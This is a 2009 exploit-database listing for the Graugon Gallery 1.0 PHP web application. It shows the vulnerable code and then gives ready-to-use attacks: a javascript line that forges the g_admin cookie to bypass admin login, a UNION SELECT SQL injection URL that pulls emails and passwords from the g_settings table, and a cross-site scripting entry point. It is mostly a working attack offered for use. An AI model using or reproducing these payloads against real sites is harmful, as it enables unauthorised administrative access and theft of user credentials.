Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities

2009-02-11T00:00:00
ID 1337DAY-ID-4841
Type zdt
Reporter x0r
Modified 2009-02-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities
==================================================================


#########################################################################################
[0x01] Informations:

Name           : Graugon Gallery  1.0
Download       : http://www.hotscripts.com/jump.php?listing_id=87617&jump_type=1
Vulnerability  : Sql Injection/ Insecure Cookie Handling/XSS
Author         : x0r
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/admin.php

[Code]
$TwoMonths = 60 * 60 * 24 * 60 + time(); 
setcookie(g_admin, 1, $TwoMonths);
[/code]

Bugged file is /[path]/view.php

[Code]

$id = $_GET['id'];
...

$query = "SELECT * FROM g_gallery WHERE id=$id";
$result = mysql_query($query);
[/code]

[Code]

$id = $_GET['id'];

echo "....<a href='view.php?id=" . $id . "'> "

[/code]


#########################################################################################
[0x03] Exploits:

Exploit: 1- javascript:document.cookie ="g_admin=1; path=/"
         2- http://victim.it/view.php?id=-1337 union select
0,0,0,concat(email,char(45),password(char45)),0,0 from g_settings--
		    ( change number of columns)
		 3- ?id=[XSSCODE]

########################################################################################




#  0day.today [2018-01-06]  #